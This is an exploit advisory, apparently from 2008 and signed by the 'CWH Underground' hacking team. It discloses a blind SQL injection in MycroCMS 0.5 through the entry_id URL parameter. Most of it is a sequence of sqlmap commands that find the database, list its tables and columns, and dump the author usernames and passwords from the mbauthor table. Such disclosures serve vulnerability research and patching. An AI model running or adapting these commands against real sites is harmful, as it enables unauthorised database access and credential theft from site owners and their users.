MycroCMS 0.5 Remote Blind SQL Injection Vulnerability======================================================= MycroCMS 0.5 Remote Blind SQL Injection Vulnerability ======================================================= ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 11 June 2008 SITE : www.citec.us ##################################################### APPLICATION : MycroCMS VERSION : 0.5 (Lastest Version) DOWNLOAD : http://downloads.sourceforge.net/mycrocms ##################################################### ---Remote Blind SQL Injection--- ***magic_quotes_gpc = off*** ----------------- Vulnerable Path ----------------- [+] http://[Target]/[mycrocms_path]/mycrocms/?entry_id=[Blind SQL] --------------------------------- Blind SQL Injection with SqlMap --------------------------------- [+] Find DB name POC Exploit: ./sqlmap.py -p `entry_id` -a `./txt/user-agents.txt` --current-db -u http://localhost/mycrocms/?entry_id=3 [+] Enumerate All Tables (Use Database `mycrocms`) POC Exploit: ./sqlmap.py -p `entry_id` -a `./txt/user-agents.txt` -D `mycrocms` --tables -u http://localhost/mycrocms/?entry_id=3 [+] Enumerate All Columns in Table (Use Table `mbauthor`) POC Exploit: ./sqlmap.py -p `entry_id` -a `./txt/user-agents.txt` -D `mycrocms` -T `mbauthor` --columns -u http://localhost/mycrocms/?entry_id=3 [+] Dump All Data in Column (Use Column `author_name` and `author_pw`) POC Exploit: ./sqlmap.py -p `entry_id` -a `./txt/user-agents.txt` -D `mycrocms` -T `mbauthor` -C author_name,author_pw --dump -u http://localhost/mycrocms/?entry_id=3 ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## # milw0rm.com [2008-06-11]